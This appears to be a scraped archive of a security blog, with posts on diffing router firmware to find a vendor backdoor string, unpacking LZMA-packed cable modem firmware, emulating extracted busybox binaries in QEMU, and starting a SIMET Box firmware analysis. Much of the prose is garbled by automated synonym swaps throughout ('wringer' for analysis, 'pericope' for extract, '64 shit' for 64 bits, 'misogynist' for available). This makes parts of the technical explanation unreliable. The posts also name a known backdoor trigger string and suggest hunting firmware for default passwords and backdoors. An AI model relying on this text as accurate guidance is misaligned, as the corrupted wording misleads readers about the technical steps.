href="http://4.bp.blogspot.com/-qfU4cMGcn5U/Up0OmJHXmwI/AAAAAAAAALs/rIX9FIxpbAA/s1600/bindiff2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://4.bp.blogspot.com/-qfU4cMGcn5U/Up0OmJHXmwI/AAAAAAAAALs/rIX9FIxpbAA/s640/bindiff2.png" width="640" /></a></div><br />We can hands spot the difference displaying the spritz graph:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-3aW8RXWeVTE/Up0QNb5nQWI/AAAAAAAAAL4/u6KMvfjpBjg/s1600/bindiff3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="427" src="http://4.bp.blogspot.com/-3aW8RXWeVTE/Up0QNb5nQWI/AAAAAAAAAL4/u6KMvfjpBjg/s640/bindiff3.png" width="640" /></a></div><br />Zooming in (courtesy of NSA):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-zmRPtCYsnJ8/Up0cNUJAyEI/AAAAAAAAAMo/TFKxXDoB-5I/s1600/bindiff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://2.bp.blogspot.com/-zmRPtCYsnJ8/Up0cNUJAyEI/AAAAAAAAAMo/TFKxXDoB-5I/s640/bindiff4.png" width="640" /></a></div><br /><br />It seems that Joel's "xmlset_roodkcableoj28840ybtide" is gone, say hello to "iNteLalsEtvaLuewitHoutnAme". And yes, it seems that Joel (and the binaries that can re-configure the device's settings) can only wangle the device from 127.0.0.1 now &nbsp;=)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wGnmdvTQNoY/Up0SgEl3k-I/AAAAAAAAAMM/P-DekGIHreM/s1600/bindiff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="329" src="http://2.bp.blogspot.com/-wGnmdvTQNoY/Up0SgEl3k-I/AAAAAAAAAMM/P-DekGIHreM/s640/bindiff5.png" width="640" /></a></div><br /><b>Conclusion</b><br /><br />Binary and directory tree diffing is a powerful tool for reverse engineering and to find potential compromise of a system as long as you have a "known template". In the context of Embedded Systems, it reveals modified files, settings and directories, narrowing the wringer to a small set of data when analyzing variegated firmware images.<br /><br />To all the vendors out there it's important to be transparent on what's stuff fixed, alerting the end-users well-nigh how hair-trigger the issues are. And please, leave the backdooring job to the guys who "<a href="http://www.youtube.com/watch?v=jMUbz4u5_NQ">read the constitution</a>" and are paid for that, OK?<br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-11631664092067064652013-11-11T11:16:00.001-02:002014-01-08T23:57:00.823-02:00Unpacking Firmware Images fromSubscriptionModemsHackingSubscriptionmodems used to be very popular during the early 2000’s. People like <a href="http://books.google.com.br/books?hl=pt-BR&amp;id=PblPcRqHM0wC">DerEngel </a>and <a href="http://isabel.la/">Isabella</a> from TCNiSO carried lots of research on the topic and talks from bitemytaco (R.I.P) and BlakeSelf during <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-self.pdf">DEFCON 16</a> and <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Blake-bitemytaco/DEFCON-18-Blake-bitemytaco-Hacking-DOCSIS.pdf">DEFCON 18</a> covered lots of information on the subject.<br /><br />Securing subscription modems is increasingly difficult than other embedded devices because, on most cases, you can’t segregate your own device/firmware and software updates are scrutinizingly entirely controlled by your ISP. Most subscription modems offer a limited legalistic interface and management commands are sent using SNMP.<br /><br /><b>Cable Modem Firmware</b><br /><br />There are basically three types of firmware images for subscription modems:<br /><br />- Signed and compresed (PKCS#7 &amp; binary)<br />- Compressed binary images<br />- RAM dump images (uncompressed &amp; raw)<br /><br /><div class="separator" style="clear: both; text-align: center;"></div>You can dump your own firmware image using <a href="http://www.usbjtag.com/">JTAG</a> or sniffing the connection during upgrades, for example. I’m a big fan of <a href="https://code.google.com/p/binwalk/">binwalk</a> and I unchangingly wondered why it doesn't unpack firmwares from popular Broadcom based subscription modems so I decided to research on this.<br /><br /><b>Unpacking the Firmware</b><br /><br />For this wringer I’ll use <a href="http://www.cisco.com/web/consumer/support/modem_DPC3925.html">Cisco DPC3925</a>, which is a very worldwide DOCSIS 3.0 modem here in Brazil. Cisco DPC3925 has a <a href="http://datasheet.elcodis.com/pdf/48/45/484522/bcm3380dkfsbg.pdf">BCM3380</a> chipset, 16MBWinkx 64MB DRAM memory configuration.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Kp_e-a2o8MM/UnxDPkDu6jI/AAAAAAAAAHg/Ez5QsVnZaEA/s1600/dpc3925.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kp_e-a2o8MM/UnxDPkDu6jI/AAAAAAAAAHg/Ez5QsVnZaEA/s320/dpc3925.png" height="146" width="320" /></a><a href="http://4.bp.blogspot.com/-NisV_3s_QBA/UnxDPdKo81I/AAAAAAAAAHc/Gv8v5CALI3Y/s1600/bcm3380.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NisV_3s_QBA/UnxDPdKo81I/AAAAAAAAAHc/Gv8v5CALI3Y/s200/bcm3380.png" height="185" width="200" /></a></div><br />The compressed firmware image has virtually 4MB. Using strings versus the file didn't help much and binwalk v1.2.1 (without any spare parameters) did not recognize it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vjLXMoM_nJ8/Unxfkex5WCI/AAAAAAAAAHs/uU7NkimPrHM/s1600/binwalk1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-vjLXMoM_nJ8/Unxfkex5WCI/AAAAAAAAAHs/uU7NkimPrHM/s400/binwalk1.png" height="161" width="400" /></a></div><br />We can gather lots of useful information from the vendor’s page: user guides, datasheets, licensing information and unshut source disclaimer for the product. There are no sources misogynist on Cisco's home, but the <a href="http://www.cisco.com/en/US/docs/video/at_home/Cable_Modems/3000_Series/7022138_A.pdf">Copyright Notices section</a> states that the product uses LZMA SDK 4.21.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eDt_IXK-cvg/UnxDOmbbIXI/AAAAAAAAAHQ/A2HHnzQfQ90/s1600/firm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-eDt_IXK-cvg/UnxDOmbbIXI/AAAAAAAAAHQ/A2HHnzQfQ90/s320/firm2.png" height="320" width="278" /></a></div><br />So we know that the firmware is probably packed using LZMA but we still need to icon out how to unpack it. Binwalk -i displays results marked as invalid during the scan and we might get some clue:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-UBWZcmPW2iA/UnxfkZT91lI/AAAAAAAAAH4/EUyOa30cra8/s1600/binwalk2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-UBWZcmPW2iA/UnxfkZT91lI/AAAAAAAAAH4/EUyOa30cra8/s400/binwalk2.png" height="187" width="400" /></a></div><div><br /></div><div>The LZMA header is not well documented. There are some good resources on&nbsp;<a href="https://github.com/cscott/lzma-purejs/blob/master/FORMAT.md">lzma-purejs Github</a>&nbsp;and you&nbsp;can moreover trammels binwalk's <a href="https://code.google.com/p/binwalk/source/browse/trunk/src/magic/lzma">magic file signatures</a> (<a href="https://twitter.com/devttys0">devttys0</a> once did all the nonflexible work for us).<br /><br /><div class="code" style="background-color: #f5f8fa; background-repeat: no-repeat no-repeat; border-color: rgb(153, 34, 17); border-style: solid; border-width: 1px 1px 1px 20px; margin: 10px 0px 10px 10px; max-height: 200px; min-height: 10px; overflow: auto; padding: 5px; width: 592.1875px;"><span style="background-color: transparent; line-height: 16px;"><span style="font-family: Courier New, Courier, monospace;">&nbsp; Offset Size &nbsp;Description</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 0 &nbsp; &nbsp; 1 &nbsp; &nbsp;lc, lp and pb in encoded form</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 1 &nbsp; &nbsp; 4 &nbsp; &nbsp;dictSize (little endian)</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 5 &nbsp; &nbsp; 8 &nbsp; &nbsp;uncompressed size (little endian)</span></span></div><div><br /></div>The Bootloader in the beggining of the wink contains the necessary information to marching the firmware image. On the top of the firmware there's unchangingly an extractor which decompress the firmware into DRAM.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jkf32ZsZQK8/UnxDMrnT5zI/AAAAAAAAAHI/OpFMDcSNVa8/s1600/firm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-jkf32ZsZQK8/UnxDMrnT5zI/AAAAAAAAAHI/OpFMDcSNVa8/s400/firm1.png" height="323" width="400" /></a></div><br />Offset 0x677 is a good candidate considering it's located in the whence of the file and it seems to have a valid header. 5D 00 00 00 01 indicates a LZMA pinch level of -8 and the next 64 shit should be the data's uncompressed size (in little endian).</div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DMH6RMw9Omc/UnxpturB6HI/AAAAAAAAAIE/Qkp1Ng6tq54/s1600/offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-DMH6RMw9Omc/UnxpturB6HI/AAAAAAAAAIE/Qkp1Ng6tq54/s640/offset.png" height="315" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>The 64 shit pursuit the header (00 20 20 0E 3A 28 AB EF) is unmistakably not a valid uncompressed size (2898643604054482944 bytes). It represents the very compressed data, making binwalk and 7zr unable to pericope it.<br /><br />What we need to do here is suspend a few uneaten bytes to the header so our regular 7zr binary can recognize and pericope the data. We don't know the uncompressed size for the firmware yet: the good news is that we can suspend and specify a big value here, permitting 7zr utility to unpack it (although weeping that the EOF was reached too early). Let's specify 268435456 bytes (256MB), convert it to little endian (00 00 00 10 00 00 00 00) and suspend it to the original LZMA header. The new header should be something like ... 5D 00 00 00 01 00 00 00 10 00 00 00 00 00 20 20 ...<br /><br />I took the opportunity to have a squint on binwalk's <a href="https://code.google.com/p/binwalk/wiki/API">API</a> and wrote a simple <a href="https://github.com/bmaia/lzma-unpacker">lzma-unpacker.py</a>:<br /><br /><script src="https://gist.github.com/bmaia/f095fde8cde3dcd2c74b.js"></script> This lawmaking will be obsolete in a couple of days considering I'm pretty sure Binwalk incorporate this (a plugin maybe?)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-nXdE3Riusdw/Un5ICQNw93I/AAAAAAAAAIU/BZYzsoT3Les/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-nXdE3Riusdw/Un5ICQNw93I/AAAAAAAAAIU/BZYzsoT3Les/s640/screenshot.png" height="394" width="640" /></a></div><br />The data was extracted successfully and contains&nbsp;21982740 bytes. If we replace the uncompressed size on the LZMA header with the correct value in Little Endian (14 6E 4F 01 00 00 00 00), the 7zr tool would not mutter well-nigh the file integrity.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4-rodBGKNGw/Un5n7qWG0WI/AAAAAAAAAJU/zGtgEpNSStE/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-4-rodBGKNGw/Un5n7qWG0WI/AAAAAAAAAJU/zGtgEpNSStE/s640/screenshot2.png" height="469" width="640" /></a></div><br />Most Broadcom subscription modems are packed this way, including the ones manufactured by variegated vendors. The script was fully tested and works fine for the pursuit models:<br /><br />&nbsp; - Cisco DPC3925, DPC2434<br />&nbsp; - Motorola SB5100, SB5101, SVG6582, SVG1202<br />&nbsp; - Thomson ACG905, DCM425, DHG534, DHG544, DWG850, DWG874<br />&nbsp; - Webstar DPC2203<br /><br /><b>Firmware Analysis</b><br /><br />Now that you successfully unpacked the firmware, here's a couple of tomfool things you should do:<br /><br />- Find default passwords<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BzZuGG8t3W8/Un5gw8HfNDI/AAAAAAAAAIk/fpecYpIN5Ik/s1600/defaultpw.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-BzZuGG8t3W8/Un5gw8HfNDI/AAAAAAAAAIk/fpecYpIN5Ik/s640/defaultpw.PNG" height="288" width="640" /></a></div><br />- Find backdoors<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sLiRf9L6UrY/Un5g3xBji4I/AAAAAAAAAIs/q5Kbdc4vSXY/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-sLiRf9L6UrY/Un5g3xBji4I/AAAAAAAAAIs/q5Kbdc4vSXY/s640/backdoor.png" height="252" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-zmTAhOZUcLY/Un58udqpgbI/AAAAAAAAAJk/B0sI_eSkTdo/s1600/backdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-zmTAhOZUcLY/Un58udqpgbI/AAAAAAAAAJk/B0sI_eSkTdo/s640/backdoor2.png" height="344" width="640" /></a></div><br />- Pentest the Web Application<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vOBSIUCeXrA/Un5g8SQlTQI/AAAAAAAAAI0/6hSkCf9VH6M/s1600/carving.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-vOBSIUCeXrA/Un5g8SQlTQI/AAAAAAAAAI0/6hSkCf9VH6M/s640/carving.png" height="394" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yFlUqmfBlUI/Un5jNkepAYI/AAAAAAAAAJA/9lfm3qWfNxQ/s1600/carving2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-yFlUqmfBlUI/Un5jNkepAYI/AAAAAAAAAJA/9lfm3qWfNxQ/s320/carving2.png" height="299" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-F-2MWNY0ENA/Un5jPxD3vDI/AAAAAAAAAJI/LJumjXRHaO8/s1600/carvin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-F-2MWNY0ENA/Un5jPxD3vDI/AAAAAAAAAJI/LJumjXRHaO8/s640/carvin3.png" height="250" width="640" /></a></div><br />- Fingerprint your device and <a href="https://github.com/bonsaiviking/missing-os-fingerprints">submit to NMAP</a><br /><br />- <a href="https://community.rapid7.com/community/infosec/sonar/blog/2013/10/27/estimating-readynas-exposure-with-internet-scans">Find similar devices</a> using <a href="http://scans.io/">scans.io</a> dataset<br /><br />- Mail&nbsp;<a href="https://twitter.com/hdmoore">HD Moore</a> a reprinting of the firmware and wait for the <a href="https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities">CVE Spam</a><br /><br /></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com36tag:blogger.com,1999:blog-3296471108082693838.post-68609088389707075062013-09-01T10:52:00.001-03:002013-09-01T10:52:31.744-03:00Analyzing and Running binaries from Firmware Images - Part 1During the first part of <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box Firmware analysis</a>, we downloaded the firmware Image, extracted its contents, compared/analyzed its wiring and found a couple of interesting files (SSH keys, binary files, init scripts, firewall rules and so on).<br /><br />For this part we'll focus on identifying binaries, comparing and executing them to find interesting data. Whenever you're analyzing binaries from variegated architectures, there are a couple of nice tools that aid debugging, reversing and emulating their behavior, like objdump, readelf and QEMU.<br /><br /><a href="http://www.emdebian.org/">Embedded Debian Project</a>&nbsp;provides pre-built binary toolchains for mips, mipsel, arm, armel, powerpc, and a couple of other architectures. In order to download and install it on Debian based Linux distros, you have to apt-get its gazetteer signing key:<br /><div class="code">sudo apt-get install emdebian-archive-keyring</div><br />Now you you need to include their repository on your /etc/apt/sources.list: <br /><div class="code">deb http://www.emdebian.org/debian/ squeeze main</div><br />After the apt-get update you can install binutils for you target archs:<br /><div class="code">sudo apt-get install binutils-mips-linux-gnu binutils-mipsel-linux-gnu &nbsp;binutils-arm-linux-gnueabi</div><br />For this little exercise I'll unriddle three <a href="http://www.busybox.net/">busybox</a> binaries, from three variegated firmwares: busybox-simet (from <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box</a>), busybox-asuswrt (from <a href="https://github.com/RMerl/asuswrt-merlin">AsusWRT-Merlin firmware</a>) and busybox-sb6120 (from <a href="http://sourceforge.net/projects/sb6120.arris/">Motorolla's SB6120 SurfboardSubscriptionModem</a>).<br /><br /><b>Architecture, Big-Endian or Little Endian?</b><br /><br />When analyzing SIMET Box we once knew that the device was based on ar71xx platform, which is MIPS based and big endian as stated on <a href="https://dev.openwrt.org/wiki/platforms">OpenWRT's official page</a>. If you want to find it by your own you can use the file utility:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-CBBg-SYPgZc/UiK5K5RnbYI/AAAAAAAAAEg/qt6RGLKteJY/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="http://4.bp.blogspot.com/-CBBg-SYPgZc/UiK5K5RnbYI/AAAAAAAAAEg/qt6RGLKteJY/s640/bin1.png" width="640" /></a></div><br />Emdebian binutils moreover provide useful tools to identify remoter info from unknown binaries. A nice hack that I wontedly use is to exhibit information from object files using variegated toolchains in order to find out which one understands the file structure properly. For example, objdump -f displays contents of the overall file header.<br /><br /><ul><li>SIMET Box tl-wr740n-v4 (architecture: mips:isa32r2,&nbsp;file format elf32-tradbigmips)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1ze58Wix7S0/UiK9PuKdMjI/AAAAAAAAAEs/8AHyr9qKZcY/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="http://4.bp.blogspot.com/-1ze58Wix7S0/UiK9PuKdMjI/AAAAAAAAAEs/8AHyr9qKZcY/s640/bin2.png" width="640" /></a></div><br /><ul><li>AsusWRT-Merlin v3.0.0.4.374.32 (architecture: mips:isa32 file format elf32-tradlittlemips)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-M2d1cJ22l28/UiK-8tlEREI/AAAAAAAAAE4/Pdr7FKi54GY/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://1.bp.blogspot.com/-M2d1cJ22l28/UiK-8tlEREI/AAAAAAAAAE4/Pdr7FKi54GY/s640/bin3.png" width="640" /></a></div><br /><ul><li>SB6120 v1.0.2.4-SCM01&nbsp;(architecture: arm,&nbsp;file format elf32-bigarm)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cZiPotVK4Z8/UiLBJoi_E2I/AAAAAAAAAFE/ZJiIAdiAigY/s1600/bin4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://4.bp.blogspot.com/-cZiPotVK4Z8/UiLBJoi_E2I/AAAAAAAAAFE/ZJiIAdiAigY/s640/bin4.png" width="640" /></a></div><br />We now know each file's format/architecture and can proceed using QEMU to emulate the binaries on a virtual environment.<br /><br /><b>QEMU</b><br /><br />QEMU&nbsp;is a generic and unshut source machine emulator and virtualizer that supports architectures like MIPS, ARM and PowerPC. In order to setup and run single binaries with QEMU on Debian based Linux distributions, you need to install the <a href="https://wiki.debian.org/QemuUserEmulation">qemu-user-static</a> package.&nbsp;<a href="https://twitter.com/keith55">RogueAsian</a> and <a href="https://twitter.com/devttyS0">devtty0</a> detail these steps&nbsp;<a href="http://milo2012.wordpress.com/2011/12/18/reversing-lifesize-220-firmware/">here</a> and <a href="http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/">here</a>.<br /><div class="code">sudo apt-get install qemu-user-static</div><br />It's important to run qemu on a chrooted environment to stave mixing your target's libraries with those on your host system.<br /><br /><b>AsusWRT-Merlin v3.0.0.4.374.32</b><br /><br />Let's try this on AsusWRT's busybox first. We'll have to use qemu-mipsel-static considering it's MIPS32 based and Little Endian.<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-w0WT9ObDf14/UiLHSwhJGDI/AAAAAAAAAFY/vbgao01qLr8/s1600/qemu1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://2.bp.blogspot.com/-w0WT9ObDf14/UiLHSwhJGDI/AAAAAAAAAFY/vbgao01qLr8/s640/qemu1.png" width="640" /></a></div><br />Hmmm, not so lucky this time, ld-uClibc.so is missing. Let's trammels the dynamic section and reprinting the necessary libraries from the original firmware:<br /><div class="code">mips-linux-gnu-objdump -x bin/busybox-asuswrt | grep lib</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yZHmy5ivQxg/UiLKp50vF7I/AAAAAAAAAF0/_86SMW1fFqE/s1600/qemu3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://1.bp.blogspot.com/-yZHmy5ivQxg/UiLKp50vF7I/AAAAAAAAAF0/_86SMW1fFqE/s640/qemu3.png" width="640" /></a></div><br />We can moreover navigate compile these libraries on our own or install the target C libraries with <a href="https://wiki.debian.org/QemuUserEmulation">dpkg-cross</a>, but using the firmware original libraries is unchangingly preferred.Withoutcopying the necessary files, we can finally execute it using QEMU:<br /><div class="code">cp `whereis qemu-mipsel-static | cut -d" " -f2` .<br />sudo chroot . ./qemu-mipsel-static bin/busybox-asuswrt</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Ujj4OH58OmA/UiLLg14KaiI/AAAAAAAAAGA/yDmjenVCNTQ/s1600/qemu4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://4.bp.blogspot.com/-Ujj4OH58OmA/UiLLg14KaiI/AAAAAAAAAGA/yDmjenVCNTQ/s640/qemu4.png" width="640" /></a></div><br /><b>SB6120 v1.0.2.4-SCM01</b><br /><br />Let's try to run busybox from Motorolla's subscription modem Surfboard SV6120 (ARM/Big Endian):<br /><br /><div class="code">cp `whereis qemu-armeb-static | cut -d" " -f2` .<br />sudo chroot . ./qemu-armeb-static bin/busybox-sb6120</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-7Xae_TVZXr0/UiLPdAfdojI/AAAAAAAAAGM/Sp-BDc4vuvs/s1600/qemu5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="http://2.bp.blogspot.com/-7Xae_TVZXr0/UiLPdAfdojI/AAAAAAAAAGM/Sp-BDc4vuvs/s640/qemu5.png" width="640" /></a></div><br />BusyBox v1.4.2, might be vulnerable to CVE-2011-2716 =)<br /><br /><b>SIMET Box tl-wr740n-v4</b><br /><br />Running the busybox binary&nbsp;<a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">extracted from SIMET Box</a>&nbsp;(MIPS/Big Endian):<br /><br /><div class="code">cp `whereis qemu-mips-static | cut -d" " -f2` .<br />sudo chroot . ./qemu-mips-static bin/busybox-simet<br />mips-linux-gnu-readelf -h bin/busybox-simet</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wl39RNd26gI/UiLZYc1PUtI/AAAAAAAAAGc/doJwAa1hndE/s1600/qemu6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="http://2.bp.blogspot.com/-wl39RNd26gI/UiLZYc1PUtI/AAAAAAAAAGc/doJwAa1hndE/s640/qemu6.png" width="640" /></a></div><br />Unfortunately, qemu-mips-static did not recognize the ELF image properly and was unable to run SIMET Box's binaries on the fly. For the next post I'll detail on how to overcome this issue with SIMET Box's busybox by running a full OpenWRT MIPS environment on QEMU. This is useful considering we can compile and run our own (compatible) kernel, set up a network device, unriddle the network worriedness and its system-wide interactions.<br /><div><br /><b>Conclusion</b></div>These techniques help identifying unknown binaries from unknown architectures and running them on a virtual environment. They might be useful to unriddle malware for embedded systems (<a href="http://internetcensus2012.bitbucket.org/paper.html">Internet Census 2012</a> anyone?), during forensic wringer and to hack/find vulnerabilities on firmware images.<br /><br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com9tag:blogger.com,1999:blog-3296471108082693838.post-59415723399995631972013-08-25T11:13:00.001-03:002013-08-25T11:13:09.656-03:00SIMET Box Firmware Analysis: Embedded Device Hacking & Forensics<span style="font-family: inherit;">For my first blog post I decided to have a quick squint on the firmware from SIMET Box. SIMET is organized by the Brazilian NIC.br in order to test and monitor the Internet speed wideness the country. For increasingly info (in portuguese) visit their site </span><a href="http://simet.nic.br/" style="font-family: inherit;">here</a><span style="font-family: inherit;">. All the data placid is&nbsp;</span>available<span style="font-family: inherit;">&nbsp;to the polity on reports and heat maps like </span><a href="http://simet.ceptro.br/mapas/" style="font-family: inherit;">this</a><span style="font-family: inherit;">.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The organization is now handing out self-ruling Wi-Fi routers to Brazilians in order to measure the Internet quality on variegated regions. The SIMET Box equipment is a custom TL-WR740N pre-installed with OpenWRT. You can moreover download and install the standalone firmware on other TPLink's SOHO routers.</span><br /><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="187" src="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" width="320" /></span></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The project is quite interesting but in times of PRISM and NSA I don't like the idea of using a "black box" at home, so I decided to trammels its design.</span><br /><span style="font-family: inherit;"><br /></span><b><span style="font-family: inherit;">Firmware</span></b><br /><span style="font-family: inherit;"><br />As I don't have the very box, I'll unriddle SIMET Box's firmware image. The firmware can be downloaded from&nbsp;<a href="http://simet.nic.br/firmware">http://simet.nic.br/firmware</a>. For this initial wringer I'll be using simetbox-tl-wr740n-v4.bin (MD5 d08798093e1591bece897671e96b5983).</span><br /><span style="font-family: inherit;"><br />Let's start by using <a href="http://www.devttys0.com/">Craig Heffner's</a> <a href="https://code.google.com/p/binwalk/">binwalk</a>&nbsp;and <a href="https://code.google.com/p/firmware-mod-kit/">firmware-mod-kit</a> to unsquash the filesystem:</span><br /><div class="code">binwalk -Me simetbox-tl-wr740n-v4.bin</div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BXXT_mX7cig/UhlA4OAvqSI/AAAAAAAAABk/FHYVgxEA3uk/s1600/binwalk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="408" src="http://3.bp.blogspot.com/-BXXT_mX7cig/UhlA4OAvqSI/AAAAAAAAABk/FHYVgxEA3uk/s640/binwalk.png" width="640" /></span></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">After extracting the files we can scan through the squashfs-root dir and grep files to identify OpenWrt's version base:</span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AP97SM8AcYw/UhljpmnvG-I/AAAAAAAAACQ/Zrk5-7YN3jA/s1600/sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="http://3.bp.blogspot.com/-AP97SM8AcYw/UhljpmnvG-I/AAAAAAAAACQ/Zrk5-7YN3jA/s640/sm.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: inherit;">We now know that SIMET Box is based on AttitudeWeldingbranch (v12.09) for&nbsp;</span>Atheros AR71xx, downloadable on OpenWRT's official site:&nbsp;<a href="http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin">openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin</a>.</div><br /><span style="font-family: inherit;">After extracting the wiring firmware (using binwalk) we now have two directory trees to diff. We can use <a href="http://winmerge.org/">WinMerge</a>&nbsp;or <a href="http://kdiff3.sourceforge.net/">Kdiff3</a>&nbsp;to compare files.</span><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a 